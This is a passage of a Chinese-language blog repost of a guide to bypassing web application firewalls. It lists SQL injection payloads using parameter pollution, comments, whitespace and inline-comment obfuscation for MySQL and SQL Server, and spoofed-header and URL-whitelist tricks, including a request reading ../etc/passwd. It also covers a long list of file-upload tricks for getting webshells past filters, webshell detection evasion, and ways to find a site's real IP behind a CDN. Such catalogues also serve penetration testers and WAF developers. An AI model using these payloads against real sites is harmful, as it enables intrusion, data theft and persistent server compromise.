<h5 id="HPP方式"><a href="#HPP方式" class="headerlink" title="HPP方式"></a>HPP方式</h5><p>HPP是指HTTP参数污染。形如以下形式：<br><code>?id=1&amp;id=2&amp;id=3</code>的形式，此种形式在获取id值的时候不同的web技术获取的值是不一样的。</p>
<p>​<br>    id&#x3D;1&amp;id&#x3D;2&amp;id&#x3D;3  </p>
<pre><code>得到的结果：  
Asp.net + iis：id=1,2,3   
Asp + iis：id=1,2,3   
Php + apache：id=3  
多种变形：MSSQL:  
大小写：?id=1 UNION/*&amp;ID=*/SELECT 1,2/*&amp;Id=*/FROM ADMIN  
GET+POST形式:   
http://192.168.125.140/test/sql.aspx?id=1 union/*  
post:  id=2*/select null,null,null  
利用逗号：?id=1 union select 1&amp;id=2&amp;id=3&amp;id=4 from admin--（无逗号形式）  
        ?a=1+union/*&amp;b=*/select+1,pass/*&amp;c=*/from+users--(分割参数注入)  
无效参数形式：?a=/*&amp;sql=xxx&amp;b=*/    
备注：a,b为无效参数，让WAF误以为我们输入的语句是在注释符里面执行的所以就不拦截  
溢出形式：?id=1/*&amp;id=*//*&amp;id=*//*......&amp;id=*//*&amp;id=*/ union  select null,system_user,null from INFORMATION_SCHEMA.schemata  
  
Mysql：  
?id=1&amp;id=1&amp;id=1&amp;id=1&amp;id=1&amp;id=1&amp;id=1&amp;id=….. &amp;id=1 union select 1,2 from admin
</code></pre>
<p>如此可以分析：当WAF获取参数的形式与WEB程序获取参数的形式不一致的时候，就可能出现WAF bypass的可能。</p>
<p>Ps.此处关键还是要分析WAF对于获取参数的方式是如何处理的。这里也要再提一下的，hpp的灵活运用，譬如有些cms基于url的白名单，因此可以利用hpp的方式在参数一的位置添加白名单目录，参数2的位置添加恶意的payload。形如<code>index.php?a=[whitelist]&amp;a=select 1 union select 2</code></p>
<p> <strong>4、宽字节</strong></p>
<p>宽字节关键字对照表：</p>
<p>​<br>    union &#x3D; uю%69яю这里把i不用宽字节 直接url编码 其他的字符都用对应的宽字节<br>    select &#x3D; こхlх%уt &#x2F;&#x2F;t不编码 其他的都宽字节 中间插上%<br>    from &#x3D; цR%яэ &#x2F;&#x2F;宽字节+%<br>    空格&#x3D;%20&#x3D;%ва &#x2F;&#x2F;в是2的款字符 а是0的宽字符<br>    , &#x3D; Ь &#x2F;&#x2F;,号的宽字节</p>
<h3 id="数据库层bypass"><a href="#数据库层bypass" class="headerlink" title="数据库层bypass"></a>数据库层bypass</h3><p>sql注入bypass WAF时，根据数据库特性去构造。</p>
<p>一般一个SQL语句组成包括如下几个位置：</p>
<p>​<br>    select * from admin where id&#x3D;1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin</p>
<p>通过对常见有5个位置进行FUZZ，可以探索更多能够绕过WAF的数据库特性。</p>
<h4 id="数据库特性"><a href="#数据库特性" class="headerlink" title="数据库特性"></a>数据库特性</h4><ul>
<li><p>注释</p>
<h1 id=""><a href="#" class="headerlink" title=""></a></h1><p>–  </p>
<hr>
<p>–+<br>&#x2F;&#x2F;<br>&#x2F;**&#x2F;<br>&#x2F;<em>letmetest</em>&#x2F;<br>;%00</p>
</li>
<li><p>科学计数法<br>1e1{union from}</p>
</li>
<li><p>空白字符</p>
<pre><code>SQLite3 0A 0D 0C 09 20  
</code></pre>
<p>Mysql %09,%0a,%0b,%0c,%0d,%a0<br>PosgresSQL 0A 0D 0C 09 20<br>Oracle 11g 00 0A 0D 0C 09 20<br>MSSQL<br>01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20</p>
</li>
<li><p>+号：</p>
</li>
<li><p>-号：</p>
</li>
<li><p>“符号：</p>
</li>
<li><p>~号：</p>
</li>
<li><p>!</p>
</li>
<li><p>@`形式`:</p>
</li>
<li><p>点号.1:</p>
</li>
<li><p>单引号双引号：</p>
</li>
<li><p>括号select(1)</p>
</li>
<li><p><code>{</code>括号</p>
</li>
<li><p>\n符号</p>
</li>
</ul>
<h4 id="mysql"><a href="#mysql" class="headerlink" title="mysql"></a>mysql</h4><h5 id="常见过滤的位置"><a href="#常见过滤的位置" class="headerlink" title="常见过滤的位置"></a>常见过滤的位置</h5><ol>
<li><p>参数和union之间的位置<br>(1):\Nunion的形式：<br>(2):浮点数的形式如1.1,8.0<br>(3):8e0的形式：<br>(4): 利用&#x2F;<em>!50000</em>&#x2F;的形式</p>
</li>
<li><p>union和select之前的位置<br>(1)空白字符<br>(2)注释<br>(3)使用括号</p>
</li>
<li><p><code>union select</code>后的位置<br>(1)空白字符<br>(2)注释<br>(3)其他方式：【这里需要考虑的是有时候union select和select from可能是两个规则，这里先整理union select的】<br>括号：<code>select(1)from</code></p>
</li>
<li><p><code>select from</code>之间的位置<br>(1)空白字符<br>(2)注释<br>(3)其他符号</p>
</li>
</ol>
<p>​<br>    &#96;&#96;符号<br>    +,-,!,~,’”<br>    *号<br>    {号<br>    (号</p>
<ol start="5">
<li><code>select from</code> 之后的位置<br>(1)空白字符<br>(2)注释<br>(3)其他符号</li>
</ol>
<h5 id="常见过滤的函数-关键字"><a href="#常见过滤的函数-关键字" class="headerlink" title="常见过滤的函数&amp;关键字"></a>常见过滤的函数&amp;关键字</h5><p>union distinct<br>union distinctrow<br>procedure analyse()<br>updatexml()<br>extracavalue()<br>exp()<br>ceil()<br>atan()<br>sqrt()<br>floor()<br>ceiling()<br>tan()<br>rand()<br>sign()<br>greatest()<br> <strong>字符串截取函数</strong><br>Mid(version(),1,1)<br>Substr(version(),1,1)<br>Substring(version(),1,1)<br>Lpad(version(),1,1)<br>Rpad(version(),1,1)<br>Left(version(),1)<br>reverse(right(reverse(version()),1)<br> <strong>字符串连接函数</strong><br>concat(version(),’|’,user());<br>concat_ws(‘|’,1,2,3)<br> <strong>字符转换</strong><br>Char(49)<br>Hex(‘a’)<br>Unhex(61)<br> <strong>过滤了逗号</strong><br>(1)limit处的逗号：<br><code>limit 1 offset 0</code><br>(2)字符串截取处的逗号<br>mid处的逗号：<br>mid(version() from 1 for 1)<br>(3)union处的逗号：<br>通过join拼接</p>
<p>​<br>    select * from corp where corp_id&#x3D;8e0union select * from (select 1)a join (select{x schema_name} from information_schema.schemata limit 1)b;</p>
<h5 id="mysqlTricks"><a href="#mysqlTricks" class="headerlink" title="mysqlTricks"></a>mysqlTricks</h5><p>​<br>    特殊符号：%a 换行符<br>       可结合注释符使用%23%0a，%2d%2d%0a。  </p>
<pre><code>内联注释：  
   /*!UnIon12345SelEcT*/ 1,user()   //数字范围 1000-50540  
  
mysql黑魔法  
   select{x username}from {x11 test.admin};
</code></pre>
<h4 id="Sqlserver"><a href="#Sqlserver" class="headerlink" title="Sqlserver"></a>Sqlserver</h4><h5 id="常见过滤位置"><a href="#常见过滤位置" class="headerlink" title="常见过滤位置"></a>常见过滤位置</h5><p>(1) select from后的位置</p>
<p> <strong>空白符号</strong> ：<br><code>01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20</code><br>需要做<code>urlencode</code>，sqlserver中的表示空白字符比较多，靠黑名单去阻断一般不合适。</p>
<p> <strong>注释</strong> ：<br><code>/**/</code></p>
<p><code>--</code></p>
<p> <strong>其他符号</strong> ：</p>
<ul>
<li><p><code>.</code>符号</p>
</li>
<li><p><code>:</code>号</p>
</li>
</ul>
<p>(2) select from之间的位置<br> <strong>空白符号</strong><br> <strong>注释</strong><br><code> :</code>号</p>
<p>(3) and之后的位置</p>
<p> <strong>空白</strong><br> <strong>注释</strong><br> <strong>其他符号</strong></p>
<ul>
<li><p><code> :</code>号</p>
</li>
<li><p><code>%2b</code>号：</p>
</li>
</ul>
<h5 id="常见过滤函数-关键字"><a href="#常见过滤函数-关键字" class="headerlink" title="常见过滤函数&amp;关键字"></a>常见过滤函数&amp;关键字</h5><p>IS_SRVROLEMEMBER()<br>IS_MEMBER()<br>HAS_DBACCESS()<br>convert()<br>col_name()<br>object_id()<br>is_srvrolemember()<br>is_member()</p>
<p> <strong>字符串截取函数</strong><br>Substring(@@version,1,1)<br>Left(@@version,1)<br>Right(@@version,1)<br> <strong>字符串转换函数</strong><br>Ascii(‘a’) 这里的函数可以在括号之间添加空格的，一些WAF过滤不严会导致bypass<br>Char(‘97’)</p>
<p> <strong>其他方式</strong> :<br>Mssql支持多语句查询，因此可以使用；结束上面的查询语句，然后执行自己构造的语句。动态执行。<br>使用exec的方式</p>
<p>使用sp_executesql的方式</p>
<h5 id="SQLServerTricks"><a href="#SQLServerTricks" class="headerlink" title="SQLServerTricks"></a>SQLServerTricks</h5><p>​<br>    （1）用来注释掉注射后查询的其余部分：<br>        &#x2F;*      C语言风格注释 *&#x2F;<br>        –      SQL注释<br>        ; 00％ 空字节  </p>
<pre><code>（2）特殊符号：%3a 冒号  
     id=1 union:select 1,2 from:admin  
  
（3）函数变形：如db_name[空白字符]()
</code></pre>
<h3 id="WAF层bypass"><a href="#WAF层bypass" class="headerlink" title="WAF层bypass"></a>WAF层bypass</h3><p>WAF在设计的时候都会考虑到性能问题，例如如果是基于数据包的话会考虑检测数据包的包长，如果是基于数据流的话就会考虑检测一条数据流的多少个字节。一般这类算检测的性能，同时为了保证WAF的正常运行，往往还会做一个bypass设计，在性能如cpu高于80%或则内存使用率高于如80%是时候，会做检测bypass，以保证设备的正常运行。</p>
<h4 id="逻辑bypass"><a href="#逻辑bypass" class="headerlink" title="逻辑bypass"></a>逻辑bypass</h4><p>（1）云WAF防护，一般我们会尝试通过查找站点的真实IP，从而绕过CDN防护。<br>（2）当提交GET、POST同时请求时，进入POST逻辑，而忽略了GET请求的有害参数输入,可轻易Bypass。<br>（3）HTTP和HTTPS同时开放服务，没有做HTTP到HTTPS的强制跳转，导致HTTPS有WAF防护，HTTP没有防护，直接访问HTTP站点绕过防护。<br>（4）特殊符号%00，部分WAF遇到%00截断，只能获取到前面的参数，无法获取到后面的有害参数输入，从而导致Bypass。比如：<code>id=1%00and 1=2 union select 1,2,column_name from information_schema.columns</code></p>
<h4 id="性能bypass"><a href="#性能bypass" class="headerlink" title="性能bypass"></a>性能bypass</h4><h5 id="性能检测bypass"><a href="#性能检测bypass" class="headerlink" title="性能检测bypass"></a>性能检测bypass</h5><p>在设计WAF的时候可能就会设计一个默认值，有可能是默认多少个字节的流大小，可能是多少个数据包。</p>
<p>如PcreWAF那题，不过这是PHP本身的，还有匹配机制自动向量机的问题</p>
<p>zone师傅设计了一个脚本，不断的向HTTP<br>POST添加填充数据，当将填充数据添加到一定数目之后，发现POST中的sql注入恶意代码没有被检测了。最终达到了bypass的目的。</p>
<h5 id="性能负载bypass"><a href="#性能负载bypass" class="headerlink" title="性能负载bypass"></a>性能负载bypass</h5><p>一些传统硬件防护设备为了避免在高负载的时候影响用户体验，如延时等等问题，会考虑在高负载的时候bypass掉自己的防护功能，等到设备的负载低于门限值的时候又恢复正常工作。<br>现在应该不能用了，WAF普遍可用性极佳</p>
<h4 id="fuzz-bypass"><a href="#fuzz-bypass" class="headerlink" title="fuzz bypass"></a>fuzz bypass</h4><p>使用脚本去探测WAF设备对于字符处理是否有异常，上面已经说过WAF在接收到网络数据之后会做相应的数据包解析，一些WAF可能由于自身的解析问题，对于某些字符解析出错，造成全局的bypass。测试的时候常常测试的位置：</p>
<p>1）：get请求处<br>2）：header请求处<br>3）：post urlencode内容处<br>4）：post form-data内容处</p>
<p>然后模糊测试的基础内容有：<br>1）编码过的0-255字符<br>2）进行编码的0-255字符<br>3）utf gbk字符</p>
<h4 id="白名单Bypass"><a href="#白名单Bypass" class="headerlink" title="白名单Bypass"></a>白名单Bypass</h4><p>方式一：IP白名单</p>
<p>从网络层获取的ip，这种一般伪造不来，如果是应用层的获取的IP，这样就可能存在伪造白名单IP造成bypass。</p>
<p>测试方法：修改http的header来bypass WAF</p>
<p>​<br>    X-forwarded-for<br>    X-remote-IP<br>    X-originating-IP<br>    x-remote-addr<br>    X-Real-ip</p>
<p>方式二：静态资源</p>
<p>特定的静态资源后缀请求，常见的静态文件(.js .jpg .swf<br>.css等等)，类似白名单机制，WAF为了检测效率，不去检测这样一些静态文件名后缀的请求。</p>
<p>​<br>    <a target="_blank" rel="noopener" href="http://10.9.9.201/sql.php/1.js?id=1">http://10.9.9.201/sql.php/1.js?id=1</a><br>    备注：Aspx&#x2F;php只识别到前面的.aspx&#x2F;.php 后面基本不识别</p>
<p>方式三：url白名单</p>
<p>为了防止误拦，部分WAF内置默认的白名单列表，如admin&#x2F;manager&#x2F;system等管理后台。只要url中存在白名单的字符串，就作为白名单不进行检测。常见的url构造姿势：</p>
<p>​<br>    <a target="_blank" rel="noopener" href="http://10.9.9.201/sql.php/admin.php?id=1">http://10.9.9.201/sql.php/admin.php?id=1</a><br>    <a target="_blank" rel="noopener" href="http://10.9.9.201/sql.php?a=/manage/&b=../etc/passwd">http://10.9.9.201/sql.php?a=/manage/&amp;b=../etc/passwd</a><br>    <a target="_blank" rel="noopener" href="http://10.9.9.201/sql.asp?id=2">http://10.9.9.201/../../../manage/../sql.asp?id=2</a></p>
<p>WAF通过&#x2F;manage&#x2F;“进行比较，只要uri中存在&#x2F;manage&#x2F;就作为白名单不进行检测，这样我们可以通过&#x2F;sql.php?a&#x3D;&#x2F;manage&#x2F;&amp;b&#x3D;..&#x2F;etc&#x2F;passwd<br>绕过防御规则。</p>
<p>方式四：爬虫白名单</p>
<p>部分WAF有提供爬虫白名单的功能，识别爬虫的技术一般有两种：</p>
<p>1、 根据UserAgent 2、通过行为来判断</p>
<p>UserAgent可以很容易欺骗，我们可以伪装成爬虫尝试绕过。</p>
<h2 id="上传Bypass"><a href="#上传Bypass" class="headerlink" title="上传Bypass"></a>上传Bypass</h2><h3 id="WAF检查位置"><a href="#WAF检查位置" class="headerlink" title="WAF检查位置"></a>WAF检查位置</h3><p>请求的url<br>Boundary边界<br>MIME类型<br>文件扩展名<br>文件内容</p>
<p>常见扩展名黑名单：</p>
<p>asp|asa|cer|cdx|aspx|ashx|ascx|asax<br>php|php2|php3|php4|php5|asis|htaccess<br>htm|html|shtml|pwml|phtml|phtm|js|jsp<br>vbs|asis|sh|reg|cgi|exe|dll|com|bat|pl|cfc|cfm|ini</p>
<h3 id="容器特性"><a href="#容器特性" class="headerlink" title="容器特性"></a>容器特性</h3><p> <strong>Apache1.X 2.X解析漏洞</strong> ：</p>
<p>Apache在以上版本中，解析文件名的方式是从后向前识别扩展名，直到遇见Apache可识别的扩展名为止。<br>shell.php.ddd这种即可bypass</p>
<p> <strong>IIS6.0两个解析缺陷</strong> ：</p>
<ul>
<li><p>目录名包含.asp 、.asa 、.cer 的话，则该目录下的所有文件都将按照asp解析。<br><code>cer.jpg</code></p>
</li>
<li><p>文件名中如果包含.asp;、.asa;、.cer;则优先使用asp解析。<br><code>asa.asa;asa.jpg</code></p>
</li>
</ul>
<p> <strong>Nginx解析漏洞</strong> ：<br>Nginx解析漏洞：</p>
<ul>
<li>Nginx 0.5. _<br>Nginx 0.6._<br>Nginx 0.7 &lt;&#x3D; 0.7.65<br>Nginx 0.8 &lt;&#x3D; 0.8.37</li>
</ul>
<p>以上Nginx容器的版本下，上传一个在WAF白名单之内扩展名的文件shell.jpg，然后以<code>shell.jpg%00.php</code>进行请求。</p>
<ul>
<li>Nginx 0.8.41 – 1.5.6：</li>
</ul>
<p>以上Nginx容器的版本下，上传一个在WAF白名单之内扩展名的文件shell.jpg，然后以<code>shell.jpg%20%00.php</code>进行请求。</p>
<p> <strong>PHP CGI解析漏洞</strong> ：</p>
<ul>
<li>IIS 7.0&#x2F;7.5<br>Nginx &lt; 0.8.3</li>
</ul>
<p>以上的容器版本中默认php配置文件cgi.fix_pathinfo&#x3D;1时，上传一个存在于白名单的扩展名文件shell.jpg，在请求时以shell.jpg&#x2F;shell.php请求，会将shell.jpg以php来解析。</p>
<p> <strong>多个Content-Disposition</strong> ：</p>
<p>在IIS的环境下，上传文件时如果存在多个Content-Disposition的话，IIS会取第一个Content-<br>Disposition中的值作为接收参数，而如果WAF只是取最后一个的话便会被绕过。</p>
<p>​<br>    ContentDisposition: form-data; name&#x3D;”file”; filename&#x3D;”shell.php”<br>    ContentDisposition: form-data; name&#x3D;”file”; filename&#x3D;”shell.jpg”</p>
<p> <strong>请求正文格式问题</strong> ：</p>
<p>Content-Disposition: form-data; name&#x3D;”file1”; filename&#x3D;”shell.asp”<br>Content-Type: application&#x2F;octet-stream</p>
<p>正常的upload请求都是以上这样，然而这个格式也并非强制性的，在IIS6.0下如果我们换一种书写方式，把filename放在其他地方：<br> <strong>结合.htaccess指定某些文件使用php来解析</strong> ：</p>
<p>这个方法通常用于绕过WAF黑名单的，配置该目录下所有文件都将其使用php来解析：</p>
<p>​<br>    &lt;FilesMatch “shell”&gt;<br>    SetHandler application&#x2F;x-httpd-php<br>    </FilesMatch></p>
<h3 id="系统特性"><a href="#系统特性" class="headerlink" title="系统特性"></a>系统特性</h3><p> <strong>Windows特殊字符</strong> ：<br>当我们上传一个文件的filename为<code>shell.php{%80-%99}</code>时<br>WAF可能识别为<code>.php{%80-%99}</code>，就会导致被绕过</p>
<p> <strong>exee扩展名</strong> ：</p>
<p>上传.exe文件通常会被WAF拦截，如果使用各种特性无用的话，那么可以把扩展名改为.exee再进行上传。</p>
<p> <strong>NTFS ADS特性</strong> ：</p>
<p>ADS是NTFS磁盘格式的一个特性，用于NTFS交换数据流。在上传文件时，如果WAF对请求正文的filename匹配不当的话可能会导致绕过。</p>
<p><img src="/./WAF%E7%BB%95%E8%BF%87.assets/20210818120739.png"></p>
<p>Windows在创建文件时，在文件名末尾不管加多少点都会自动去除，那么上传时filename可以这么写<code>shell.php......</code>也可以这么写<code>shell.php::$DATA.......</code>。</p>
<h3 id="WAF缺陷"><a href="#WAF缺陷" class="headerlink" title="WAF缺陷"></a>WAF缺陷</h3><p> <strong>匹配过于严谨</strong> ：<br>一个空格导致安全狗被绕过：</p>
<p>​<br>    Content-Type: multipart&#x2F;form-data;<br>    boundary&#x3D;—————————4714631421141173021852555099  </p>
<pre><code>boundary =---------------------------4714631421141173021852555099
</code></pre>
<p>但如果容器在处理的过程中并没有严格要求一致的话可能会导致一个问题，两段Boundary不一致使得WAF认为这段数据是无意义的，可是容器并没有那么严谨</p>
<p> <strong>数据过长导致的绕过</strong> ：</p>
<p>WAF如果对Content-Disposition长度处理的不够好的话可能会导致绕过</p>
<p><img src="/./WAF%E7%BB%95%E8%BF%87.assets/20210818120742.png"></p>
<p> <strong>基于文件名</strong> ：</p>
<ul>
<li><p>基于构造长文件名<br>如果web程序会将filename除了扩展名的那段重命名的话，那么还可以构造更多的点、符号等等。<br><code>shell.../*10000个*/...asp</code></p>
</li>
<li><p>特殊的长文件名：<br>文件名使用非字母数字，比如中文等最大程度的拉长，不行的话再结合一下其他的特性进行测试：<br><code>shell.asp;文文文文文文文文文文文文文文文文文文/*100个*/文文文文文文文文文文文文文文文文文.jpg</code></p>
</li>
</ul>
<h3 id="一些上传绕过trick"><a href="#一些上传绕过trick" class="headerlink" title="一些上传绕过trick"></a>一些上传绕过trick</h3><p>​<br>    1. filename在content-type下面<br>    2. .asp{80-90}<br>    3. NTFS ADS<br>    4. .asp…<br>    5. boundary不一致<br>    6. iis6分号截断asp.asp;asp.jpg<br>    7. apache解析漏洞php.php.ddd<br>    8. boundary和content-disposition中间插入换行<br>    9. hello.php:a.jpg然后hello.&lt;&lt;&lt;<br>    10. filename&#x3D;php.php<br>    11. filename&#x3D;”a.txt”;filename&#x3D;”a.php”<br>    12. name&#x3D;\n”file”;filename&#x3D;”a.php”<br>    13. content-disposition:\n<br>    14. .htaccess文件<br>    15. a.jpg.\nphp<br>    16. 去掉content-disposition的form-data字段<br>    17. php&lt;5.3 单双引号截断特性<br>    18. 删掉content-disposition: form-data;<br>    19. content-disposition\00:<br>    20. {char}+content-disposition<br>    21. head头的content-type: tab<br>    22. head头的content-type: multipart&#x2F;form-DATA<br>    23. filename后缀改为大写<br>    24. head头的Content-Type: multipart&#x2F;form-data;\n<br>    25. .asp空格<br>    26. .asp0x00.jpg截断<br>    27. 双boundary<br>    28. file\nname&#x3D;”php.php”<br>    29. head头content-type空格:<br>    30. form-data字段与name字段交换位置  </p>
<h2 id="其他情况bypass"><a href="#其他情况bypass" class="headerlink" title="其他情况bypass"></a>其他情况bypass</h2><h3 id="Bypass-菜刀连接拦截"><a href="#Bypass-菜刀连接拦截" class="headerlink" title="Bypass 菜刀连接拦截"></a>Bypass 菜刀连接拦截</h3><p>多数WAF对请求进行检测时由于事先早已纳入了像菜刀这样的样本。通常WAF对这块的<br>检测就是基于样本，所以过于死板。</p>
<p>云盾：fuzz eval、base64这些关键字前后存在什么字符串会绕过，%01这种空字符插对地方即可</p>
<p>360主机卫士：在eval函数前面插入任意urlencode的字符即可</p>
<h3 id="webshell-免杀"><a href="#webshell-免杀" class="headerlink" title="webshell 免杀"></a>webshell 免杀</h3><p>讲webshell免杀也就直接写写姿势，一些特性功能、畸形语法、生僻函数比如回调等<br>绕过查杀语法，不断变种、变种、变种。。。（混淆太恶心了，将其拿到实战上的人是<br>怎么想的？）</p>
<p>为了用户体验，主机防护软件对eval这类函数只要不被外部可控就不会被拦截</p>
<h3 id="Bypass-禁止执行程序"><a href="#Bypass-禁止执行程序" class="headerlink" title="Bypass 禁止执行程序"></a>Bypass 禁止执行程序</h3><p>黑客在进行提权时，主机防护软件安全狗、星外等会进行拦截。原理上都是基于黑白<br>名单进行拦截敏感的程序调用。</p>
<p>可以找其他软件的白名单，进行伪装。</p>
<h3 id="Bypass-CDN查找原IP"><a href="#Bypass-CDN查找原IP" class="headerlink" title="Bypass CDN查找原IP"></a>Bypass CDN查找原IP</h3><p>cdn隐藏了原ip，在某种情况上使黑客无法做不正当勾当，那么自然就有各种绕过的方<br>法。在这里附上一些靠谱的姿势和小工具。</p>
<p>由于cdn不可能覆盖的非常完全，那么可以采用国外多地ping的方式，或者多收集一些小国家的冷门dns然后nslookup domain.com<br>dnsserver。</p>
<p>让服务器主动连接：</p>
<ul>
<li><p>在可上传图片的地方利用目标获取存放在自己服务器的图片，或者任何可pull自己资源的点，review log即可拿到。</p>
</li>
<li><p>通过注册等方式让目标主动发邮件过来，此方法对于大公司几率小，因为出口可能是统一的邮件服务器。可以尝试扫其MailServer网段。</p>
</li>
</ul>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p>Bypass WAF Cookbook | WooYun知识库</p>
<p>Cookbook同作者硬件IPS</p>
<p>CongRong 我的WAFBypass之道</p>
<p>那些可以绕过WAF的各种特性</p>
<p> <strong>推荐阅读</strong><a target="_blank" rel="noopener" href="http://mp.weixin.qq.com/s?__biz=MzAwMjA5OTY5Ng==&mid=2247497658&idx=1&sn=87d6b678c3dab4baeeb28ca81276d333&chksm=9acd2725adbaae334bd016bf907ed651a1b1529279a04cb45aad101025d2f09a4637e8810072&scene=21#wechat_redirect"><br><strong><img src="/./WAF%E7%BB%95%E8%BF%87.assets/20210818120744.png"></strong></a></p>
<p> <strong>觉得不错点个 <strong>“赞”</strong> 、“在看”哦</strong><br><strong><img src="/./WAF%E7%BB%95%E8%BF%87.assets/20210818120747.png"></strong></p>
<p>预览时标签不可点</p>
<p>收录于话题 #</p>
<p>个 __</p>
<p>上一篇 下一篇</p>
<p>阅读原文</p>
<p>阅读</p>
<p>分享 收藏</p>
<p>赞 在看</p>
<p>____已同步到看一看<a href="javascript:;">写下你的想法</a></p>
<p>前往“发现”-“看一看”浏览“朋友在看”</p>
<p><img src="//res.wx.qq.com/mmbizwap/zh_CN/htmledition./WAF%E7%BB%95%E8%BF%87.assets/pic/appmsg/pic_like_comment55871f.png"></p>
<p>前往看一看</p>
<p><strong>看一看入口已关闭</strong></p>
<p>在“设置”-“通用”-“发现页管理”打开“看一看”入口</p>
<p><a href="javascript:;">我知道了</a></p>
<p>__</p>
<p>已发送</p>
<p>取消 __</p>
<h4 id="发送到看一看"><a href="#发送到看一看" class="headerlink" title="发送到看一看"></a>发送到看一看</h4><p>发送</p>
<p>干货|WAF绕过思路整理</p>
<p>最多200字，当前共字</p>
<p>__</p>
<p>发送中</p>
<p>微信扫一扫<br>关注该公众号</p>
<p>微信扫一扫<br>使用小程序</p>
<hr>
<p><a href="javascript:void(0);">取消</a> <a href="javascript:void(0);">允许</a></p>
<hr>
<p><a href="javascript:void(0);">取消</a> <a href="javascript:void(0);">允许</a></p>
<p><a href="javascript:;">知道了</a></p>
<p><strong>长按识别前往小程序</strong></p>
<p><img src="/"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/WHOAMI-xiaoyu">Projects</a></li>
        
          <li><a href="/links/">Links</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B9%B2%E8%B4%A7-WAF%E7%BB%95%E8%BF%87%E6%80%9D%E8%B7%AF%E6%95%B4%E7%90%86"><span class="toc-number">1.</span> <span class="toc-text">干货|WAF绕过思路整理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B9%E6%B3%95%E8%AE%BA"><span class="toc-number">2.</span> <span class="toc-text">方法论</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WAF%E6%9C%AC%E4%BD%93"><span class="toc-number">3.</span> <span class="toc-text">WAF本体</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E7%B1%BB"><span class="toc-number">3.1.</span> <span class="toc-text">分类</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%BA%E5%88%B6"><span class="toc-number">3.2.</span> <span class="toc-text">机制</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Bypass"><span class="toc-number">4.</span> <span class="toc-text">Bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Web-Server%E5%B1%82-bypass"><span class="toc-number">4.1.</span> <span class="toc-text">Web Server层 bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#IIS"><span class="toc-number">4.1.1.</span> <span class="toc-text">IIS</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Apache"><span class="toc-number">4.1.2.</span> <span class="toc-text">Apache</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F%E5%B1%82bypass"><span class="toc-number">4.2.</span> <span class="toc-text">Web应用程序层bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Encoder"><span class="toc-number">4.2.1.</span> <span class="toc-text">Encoder</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%8C%E9%87%8DURL%E7%BC%96%E7%A0%81"><span class="toc-number">4.2.2.</span> <span class="toc-text">双重URL编码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%AF%B7%E6%B1%82%E8%8E%B7%E5%8F%96%E6%96%B9%E5%BC%8F"><span class="toc-number">4.2.3.</span> <span class="toc-text">请求获取方式</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%8F%98%E6%8D%A2%E8%AF%B7%E6%B1%82%E6%96%B9%E5%BC%8F"><span class="toc-number">4.2.3.1.</span> <span class="toc-text">变换请求方式</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E7%95%B8%E5%BD%A2%E8%AF%B7%E6%B1%82%E6%96%B9%E5%BC%8F"><span class="toc-number">4.2.3.2.</span> <span class="toc-text">畸形请求方式</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#HPP%E6%96%B9%E5%BC%8F"><span class="toc-number">4.2.3.3.</span> <span class="toc-text">HPP方式</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93%E5%B1%82bypass"><span class="toc-number">4.3.</span> <span class="toc-text">数据库层bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93%E7%89%B9%E6%80%A7"><span class="toc-number">4.3.1.</span> <span class="toc-text">数据库特性</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">5.</span> <span class="toc-text"></span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#mysql"><span class="toc-number">5.1.</span> <span class="toc-text">mysql</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E8%BF%87%E6%BB%A4%E7%9A%84%E4%BD%8D%E7%BD%AE"><span class="toc-number">5.1.1.</span> <span class="toc-text">常见过滤的位置</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E8%BF%87%E6%BB%A4%E7%9A%84%E5%87%BD%E6%95%B0-%E5%85%B3%E9%94%AE%E5%AD%97"><span class="toc-number">5.1.2.</span> <span class="toc-text">常见过滤的函数&amp;关键字</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#mysqlTricks"><span class="toc-number">5.1.3.</span> <span class="toc-text">mysqlTricks</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Sqlserver"><span class="toc-number">5.2.</span> <span class="toc-text">Sqlserver</span></a><ol class="toc-child"><li class="toc-item 